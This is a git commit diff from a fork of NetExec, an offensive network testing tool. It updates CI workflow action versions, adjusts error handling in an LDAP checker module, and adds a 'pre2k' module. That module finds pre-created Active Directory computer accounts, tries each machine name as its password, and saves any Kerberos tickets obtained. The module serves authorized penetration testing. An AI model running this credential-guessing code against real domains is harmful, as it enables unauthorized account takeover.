Merge branch 'Pennyw0rth:main' into main

r4vanan · web-flow · commit 3fd85983892d · 2024-08-31T09:54:11.000+05:30
diff --git a/.github/workflows/build-binaries.yml b/.github/workflows/build-binaries.yml
@@ -13,9 +13,9 @@ jobs:
         python-version: ["3.11"]
         #python-version: ["3.8", "3.9", "3.10", "3.11"] # for binary builds we only need one version
     steps:
-    - uses: actions/checkout@v3
+    - uses: actions/checkout@v4
     - name: NetExec set up python on ${{ matrix.os }}
-      uses: actions/setup-python@v4
+      uses: actions/setup-python@v5
       with:
         python-version: ${{ matrix.python-version }}
     - name: Build Native Binary
diff --git a/.github/workflows/build-zipapps.yml b/.github/workflows/build-zipapps.yml
@@ -12,9 +12,9 @@ jobs:
         os: [ubuntu-latest, macOS-latest, windows-latest]
         python-version: ["3.8", "3.9", "3.10", "3.11"]
     steps:
-    - uses: actions/checkout@v3
+    - uses: actions/checkout@v4
     - name: NetExec set up python on ${{ matrix.os }}
-      uses: actions/setup-python@v4
+      uses: actions/setup-python@v5
       with:
         python-version: ${{ matrix.python-version }}
     - name: Build Python ZipApp with Shiv
diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml
@@ -3,6 +3,7 @@ name: Lint Python code with ruff
 
 on:
   push:
+  workflow_dispatch:
 
 jobs:
   lint:
@@ -11,12 +12,12 @@ jobs:
       github.event_name == 'push' || github.event.pull_request.head.repo.full_name != github.repository
 
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@v4
       - name: Install poetry
         run: |
           pipx install poetry
       - name: Set up Python
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
         with:
           python-version: 3.11
           cache: poetry
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
@@ -16,12 +16,12 @@ jobs:
         os: [ubuntu-latest]
         python-version: ["3.8", "3.9", "3.10", "3.11", "3.12"]
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@v4
       - name: Install poetry
         run: |
           pipx install poetry
       - name: NetExec set up python ${{ matrix.python-version }} on ${{ matrix.os }}
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
         with:
           python-version: ${{ matrix.python-version }}
           cache: poetry
diff --git a/nxc/modules/ldap-checker.py b/nxc/modules/ldap-checker.py
@@ -99,8 +99,8 @@ def DoesLdapsCompleteHandshake(dcIp):
                 do_handshake_on_connect=False,
                 suppress_ragged_eofs=False,
             )
-            ssl_sock.connect((dcIp, 636))
             try:
+                ssl_sock.connect((dcIp, 636))
                 ssl_sock.do_handshake()
                 ssl_sock.close()
                 return True
@@ -126,7 +126,7 @@ async def run_ldap(target, credential):
                 _, err = await ldapsClientConn.connect()
                 if err is not None:
                     context.log.fail(str(err))
-                    return False
+                    return None
                 
                 _, err = await ldapsClientConn.bind()
                 if err is not None:
@@ -142,7 +142,7 @@ async def run_ldap(target, credential):
                     # because LDAP server signing requirements are not enforced
             except Exception as e:
                 context.log.debug(str(e))
-                return False
+                return None
               
 
         # Run trough all our code blocks to determine LDAP signing and channel binding settings.
diff --git a/nxc/modules/pre2k.py b/nxc/modules/pre2k.py
@@ -0,0 +1,126 @@
+import os
+from impacket.krb5.kerberosv5 import getKerberosTGT
+from impacket.krb5.ccache import CCache
+from impacket.krb5.types import Principal
+from impacket.krb5 import constants
+
+from nxc.parsers.ldap_results import parse_result_attributes
+from nxc.paths import NXC_PATH
+
+
+class NXCModule:
+    """
+    Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each pre-created computer account.
+    Module by: @shad0wcntr0ller
+    """
+    name = "pre2k"
+    description = "Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each"
+    supported_protocols = ["ldap"]
+    opsec_safe = True
+    multiple_hosts = False
+
+    def options(self, context, module_options):
+        pass
+
+    def on_login(self, context, connection):
+        try:
+            ldap_connection = connection.ldapConnection
+
+            # Define the search filter for pre-created computer accounts
+            search_filter = "(&(objectClass=computer)(userAccountControl=4128))"
+            attributes = ["sAMAccountName", "userAccountControl", "dNSHostName"]
+
+            context.log.info(f"Using search filter: {search_filter}")
+            context.log.info(f"Attributes to retrieve: {attributes}")
+
+            computers = []
+
+            try:
+                # Use paged search to retrieve all computer accounts with specific flags
+                search_results = connection.search(search_filter, attributes)
+                results = parse_result_attributes(search_results)
+                context.log.debug(f"Search results: {results}")
+
+                for computer in results:
+                    context.log.debug(f"Processing computer: {computer['sAMAccountName']}, UAC: {computer['userAccountControl']}")
+                    # Check if the account is a pre-created computer account
+                    if int(computer["userAccountControl"]) == 4128:  # 4096 | 32
+                        computers.append(computer["sAMAccountName"])
+                        context.log.debug(f"Added computer: {computer['sAMAccountName']}")
+
+                # Save computers to file
+                domain_dir = os.path.join(f"{NXC_PATH}/modules/pre2k", connection.domain)
+                output_file = os.path.join(domain_dir, "precreated_computers.txt")
+
+                # Create directories if they do not exist
+                os.makedirs(domain_dir, exist_ok=True)
+
+                with open(output_file, "w") as file:
+                    for computer in computers:
+                        file.write(f"{computer}\n")
+
+                # Print discovered pre-created computer accounts
+                if computers:
+                    for computer in computers:
+                        context.log.highlight(f"Pre-created computer account: {computer}")
+                    context.log.success(f"Found {len(computers)} pre-created computer accounts. Saved to {output_file}")
+                else:
+                    context.log.info("No pre-created computer accounts found.")
+
+                # Obtain TGTs and save to ccache
+                ccache_base_dir = f"{NXC_PATH}/modules/pre2k/ccache"
+                os.makedirs(ccache_base_dir, exist_ok=True)
+
+                successful_tgts = 0
+
+                for computer in computers:
+                    machine_name = computer[:-1].lower()  # Remove trailing '$' and convert to lowercase
+                    if self.get_tgt(context, machine_name, connection.domain, connection.kdcHost, ccache_base_dir):
+                        successful_tgts += 1
+
+                # Summary of TGT results
+                context.log.success(f"Successfully obtained TGT for {successful_tgts} pre-created computer accounts. Saved to {ccache_base_dir}")
+
+            except Exception as e:
+                context.log.fail(f"Error occurred during search: {e}")
+
+            ldap_connection.close()
+            return True
+
+        except Exception as e:
+            context.log.fail(f"Error occurred during LDAP connection: {e}")
+            return False
+
+    def get_tgt(self, context, username, domain, kdcHost, ccache_base_dir):
+        try:
+            userName = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+            password = username  # Password is the machine name in lowercase
+            context.log.info(f"Getting TGT for {username}@{domain}")
+
+            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(
+                clientName=userName,
+                password=password,
+                domain=domain,
+                lmhash="",
+                nthash="",
+                aesKey="",
+                kdcHost=kdcHost,
+                serverName=None
+            )
+
+            self.save_ticket(context, username, tgt, oldSessionKey, ccache_base_dir)
+            context.log.success(f"Successfully obtained TGT for {username}@{domain}")
+            return True
+        except Exception as e:
+            context.log.fail(f"Failed to get TGT for {username}@{domain}: {e}")
+            return False
+
+    def save_ticket(self, context, username, ticket, sessionKey, ccache_base_dir):
+        try:
+            ccache = CCache()
+            ccache.fromTGT(ticket, sessionKey, sessionKey)
+            ccache_filename = os.path.join(ccache_base_dir, f"{username}.ccache")
+            ccache.saveFile(ccache_filename)
+            context.log.info(f"Saved ticket in {ccache_filename}")
+        except Exception as e:
+            context.log.fail(f"Failed to save ticket for {username}: {e}")
